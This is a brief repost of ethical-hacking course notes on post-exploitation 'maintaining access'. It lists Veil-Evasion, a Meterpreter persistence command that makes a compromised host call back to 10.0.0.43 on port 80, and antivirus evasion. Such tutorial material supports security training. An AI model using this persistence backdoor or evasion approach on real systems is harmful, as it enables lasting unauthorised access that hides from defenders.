其他分享
首页 > 其他分享> > Ethical Hacking - POST EXPLOITATION(2)

Ethical Hacking - POST EXPLOITATION(2)

作者:互联网

MAINTAINING ACCESS - Methods

1. Using a veil-evasion

2. Using persistence module

run persistence -U -i 20 -p 80 -r 10.0.0.43

 

3. Using Metasploit + veil-evasion -> More robust + undetectable by Antivirus

 

标签:Ethical,set,Rev,EXPLOITATION,exploit,session,Using,Hacking,persistence
来源: https://www.cnblogs.com/keepmoving1113/p/12270080.html